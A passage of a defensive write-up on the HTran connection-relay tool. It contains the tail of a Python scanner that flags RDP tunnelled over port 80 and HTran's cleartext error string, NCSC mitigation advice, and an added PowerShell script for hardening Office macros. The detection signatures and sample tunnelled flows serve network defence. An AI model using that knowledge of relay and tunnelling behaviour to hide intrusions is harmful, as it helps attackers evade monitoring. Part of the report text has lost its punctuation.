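            findings.append((flow["src"], flow["dst"], flow["dport"],
                             "rdp_on_unexpected_port", None))
    return findings


def build_x224_cr(cookie=b"Cookie: mstshash=user\r\n"):
    """Constructed RDP opener for the samples: TPKT + X.224 CR + routing cookie.
    X.224 body = CR code, DST-REF, SRC-REF, class option, then the cookie."""
    body = b"\xe0" + b"\x00\x00" + b"\x00\x00" + b"\x00" + cookie
    x224 = bytes([len(body)]) + body          # length indicator excludes itself
    return b"\x03\x00" + (4 + len(x224)).to_bytes(2, "big") + x224


# Constructed flows: ordinary HTTP, RDP where expected, RDP wrapped in port 80
# the way the incident above describes, and a relay error echoed in the clear.
CONSTRUCTED_FLOWS = [
    {"src": "10.0.0.5", "dst": "203.0.113.7", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"},
    {"src": "10.0.0.5", "dst": "10.0.0.20", "dport": 3389, "payload": build_x224_cr()},
    {"src": "10.0.0.80", "dst": "203.0.113.7", "dport": 80, "payload": build_x224_cr()},
    {"src": "10.0.0.80", "dst": "203.0.113.7", "dport": 80,
     "payload": b"[SERVER]connection to 10.0.0.20:3389 error\r\n"},
]


def run_scan():
    """Scan the constructed flows."""
    return scan_flows(CONSTRUCTED_FLOWS)


if __name__ == "__main__":
    for finding in run_scan():
        print(finding)
```

The error-string match only fires when a relay target is down, so it is a lucky catch rather than a steady signal; the protocol-on-the-wrong-port check is the durable one, and it applies equally to the proxy and client modes because the rootkit hides the connection from the host, not from the network. Note that the error check is a byte-level signature on the application payload and therefore sees nothing once the relay is wrapped in TLS on port 443.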
need access to a machine to install and run HTran so network defenders should apply security patches and use good access control to prevent attackers installing malicious applications Network monitoring10 and firewalls can help prevent and detect unauthorised connections from tools such as HTran In some of the samples analysed the rootkit component of HTran only hides connection details when the proxy mode is used When client mode is used defenders can view details about the TCP connections being made HTran also includes a debugging condition that is useful for network defenders In the event that a destination becomes unavailable HTran generates an error message using the following format sprint buffer “ SERVER connection to %s %d error r n” host port2 This error message is relayed to the connecting client in the clear Defenders can monitor for this error message to potentially detect HTran instances active in their environments 10 https www ncsc gov uk guidance introduction-logging-security-purposes Page 16 Joint report on publicly available hacking tools General detection and prevention measures There are several measures that will improve the overall cyber security of your organisation and help protect it against the types of tools highlighted by this report Network defenders are advised to seek further information using the links below Protecting your organisation from malware small business guide https www ncsc gov uk guidance protecting-your-organisation-malware Board toolkit five question for your board’s agenda https www ncsc gov uk guidance board-toolkit-five-questions-your-boards-agenda Use multi-factor authentication 2-factor authentication two-step authentication to reduce the impact of password compromises See NCSC guidance https www ncsc gov uk guidance multi-factor-authentication-online-services https www ncsc gov uk guidance setting-two-factor-authentication-2fa Protect your devices and networks by keeping them up to date use the latest supported 
versions, apply security patches promptly, use antivirus and scan regularly to guard against known malware threats. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/mitigating-malware

Prevent and detect lateral movement in your organisation's networks. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement

Implement architectural controls for network segregation. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/10-steps-network-security

Protect the management interfaces of your critical operational systems. In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See NCSC blog post: https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces

Set up a security monitoring capability so you are collecting the data that will be needed to analyse network intrusions. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes

Review and refresh your incident management processes. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/10-steps-incident-management

Update your systems and software. Ensure your operating system and productivity apps are up to date. Users with Office 365 licensing can use 'click to run' to keep their office applications seamlessly updated.

Use modern systems and software. These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/obsolete-platforms-security

Manage bulk personal datasets properly. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/protecting-bulk-personal-data-introduction

Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points, e.g. third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement and https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security

Whitelist applications. If supported by your operating environment, consider whitelisting of permitted applications. This will help prevent malicious applications from running. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/eud-security-guidance-windows-10-1709#applicationwhitelistingsection

Manage macros carefully. Disable Office macros except in the specific apps where they are required. Only enable macros for users that need them day-to-day. Use a recent and fully patched version of Office and the underlying platform, ideally configured in line with the NCSC's EUD Security Guidance. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/end-user-device-security and https://www.ncsc.gov.uk/guidance/macro-security-microsoft-office

Use antivirus. Keep any antivirus software up to date, and consider use of a cloud-backed antivirus product that can benefit from the economies of scale this brings. Ensure that it is also capable of scanning MS Office macros. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/macro-security-microsoft-office

Layer phishing defences. Detect and quarantine as many malicious email attachments and spam as possible before they reach your end users. Multiple layers of defence will greatly cut the chances of a compromise.

Treat people as your first line of defence. Tell staff how to report suspected phishing emails, and ensure they feel confident to do so. Investigate their reports promptly and thoroughly. Never punish users for clicking phishing links or opening attachments. See NCSC Guidance: https://www.ncsc.gov.uk/phishing

Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets.

Defend your systems and networks against denial of service attacks. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/denial-service-dos-guidance-collection

Defend your organisation from ransomware. Keep safe backups of important files, protect from malware, and don't pay the ransom: it may not get your data back. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/mitigating-malware and https://www.ncsc.gov.uk/guidance/backing-your-data

Make sure you are handling personal data appropriately and securely. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/gdpr-security-outcomes

Further information

Invest in preventing malware-based attacks across various scenarios. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/mitigating-malware

See also the following advice from our international partners:

• ACSC Strategies: https://acsc.gov.au/infosec/mitigationstrategies.htm
• ACSC Essential Eight: https://acsc.gov.au/publications/protect/essential-eight-explained.htm
• CCCS Top 10 Security Actions: https://cyber.gc.ca/en/top-10-it-security-actions
• CCCS Cyber Hygiene: https://cyber.gc.ca/en/guidance/cyber-hygiene
• CERT NZ's critical controls 2018: https://www.cert.govt.nz/it-specialists/critical-controls
• CERT NZ's Top 11 cyber security tips for your business: https://www.cert.govt.nz/businesses-and-individuals/guides/cyber-security-your-business/top-11-cyber-security-tips-for-your-business
• NCSC NZ Resources: https://www.ncsc.govt.nz/resources
• New Zealand Information Security Manual: https://www.gcsb.govt.nz/the-nz-information-security-manual
• NCCIC Tip: Handling Destructive Malware: https://www.us-cert.gov/ncas/tips/ST13-003
• NCCIC Tip: Supplementing Passwords: https://www.us-cert.gov/ncas/tips/ST05-012
• NCCIC Tip: Understanding Patches: https://www.us-cert.gov/ncas/tips/ST04-006
• NCCIC Tip: Understanding Antivirus: https://www.us-cert.gov/ncas/tips/ST04-005
• NCCIC Tip: Protecting Your Privacy: https://www.us-cert.gov/ncas/tips/ST04-013
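As an added example, not part of the NCSC report, the following PowerShell applies the macro policy described above ("disable Office macros except in the specific apps where they are required") on a single Windows host and then audits the result: macros are disabled without notification in Word, Excel and PowerPoint, one app is allowed to run digitally signed macros only, and macros in files that arrived from the internet are blocked in all three. The Office registry version key "16.0", the list of applications and the single exception (Excel) are assumptions for illustration. On a managed estate the same settings are normally delivered through Group Policy with the Office ADMX templates; the audit function is still useful there to confirm what actually reached a host.

```powershell
# Added example, not from the NCSC report.
# Assumption: Office 2016/2019/365, whose policy keys live under the "16.0" version key.
$OfficeVersion   = '16.0'
$Apps            = 'Word', 'Excel', 'PowerPoint'
$SignedMacroApps = @('Excel')   # assumption: apps where signed macros are still required day-to-day

# VBAWarnings values understood by Office:
#   4 = disable all macros without notification
#   3 = disable all macros except digitally signed macros
function Set-OfficeMacroPolicy {
    param([string]$Version, [string[]]$AppNames, [string[]]$AllowSigned)

    foreach ($app in $AppNames) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\$Version\$app\Security"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }

        # Default to "no macros at all"; allow only signed macros for the listed exceptions
        $level = if ($AllowSigned -contains $app) { 3 } else { 4 }
        Set-ItemProperty -Path $key -Name 'VBAWarnings' -Value $level -Type DWord

        # Block macros in files carrying the Mark-of-the-Web (downloads, mail attachments)
        Set-ItemProperty -Path $key -Name 'BlockContentExecutionFromInternet' -Value 1 -Type DWord
    }
}

# Audit: report each app's effective policy values and whether they meet the baseline
function Get-OfficeMacroPolicy {
    param([string]$Version, [string[]]$AppNames)

    foreach ($app in $AppNames) {
        $key   = "HKCU:\Software\Policies\Microsoft\Office\$Version\$app\Security"
        $props = if (Test-Path $key) { Get-ItemProperty -Path $key } else { $null }
        [pscustomobject]@{
            App               = $app
            VBAWarnings       = $props.VBAWarnings
            BlockFromInternet = $props.BlockContentExecutionFromInternet
            Compliant         = ($props.VBAWarnings -in 3, 4) -and
                                ($props.BlockContentExecutionFromInternet -eq 1)
        }
    }
}

Set-OfficeMacroPolicy -Version $OfficeVersion -AppNames $Apps -AllowSigned $SignedMacroApps
Get-OfficeMacroPolicy -Version $OfficeVersion -AppNames $Apps | Format-Table -AutoSize
```

Run it in the context of the user whose Office profile is being hardened, since the keys are under HKCU. Running only Get-OfficeMacroPolicy across a fleet (for example via a remoting job) gives a quick list of hosts where a user still has VBAWarnings below 3 or no internet-origin block, which is the state the report's "manage macros carefully" item is meant to eliminate.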